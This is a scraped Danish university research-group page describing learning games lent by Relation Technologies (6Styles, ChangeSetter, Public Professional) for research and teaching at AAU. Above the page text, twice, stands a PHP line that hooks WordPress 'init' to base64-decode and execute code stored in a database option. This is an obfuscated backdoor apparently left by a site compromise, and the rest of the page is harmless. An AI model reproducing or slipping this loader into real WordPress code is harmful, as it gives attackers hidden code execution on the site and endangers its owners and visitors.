add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); Relation Technologies - procespsykologi

Relation Technologies

Virksomheden Relation Technologies har været så venlige at stille en række teknologier, herunder læringsspil, konsulentredskaber og processer til rådighed for OPs forskningsarbejde, herunder:

  • 6Styles om Golemans ledelsesstile og deres indvirken på det psykologiske klima
  • ChangeSetter om Rick Maurer’s og Kotter’s forståelse for fremdrift og modstand mod forandring
  • Public Professional om  offentlige organisationers kommunikation til borgere

Spillene anvendes både i gruppens forskningsarbejde og i undervisningen på AAU, herunder på Hum.Inf, Kommunikation og Master i Ikt og Læring.

Virksomheden Relation Technologies har været så venlige at stille en række teknologier, herunder læringsspil, konsulentredskaber og processer til rådighed for OPs forskningsarbejde, herunder: 6Styles om Golemans ledelsesstile og deres indvirken på det psykologiske klima ChangeSetter om Rick Maurer's og Kotter's forståelse for fremdrift og modstand mod forandring Public Professional om  offentlige organisationers kommunikation til borgere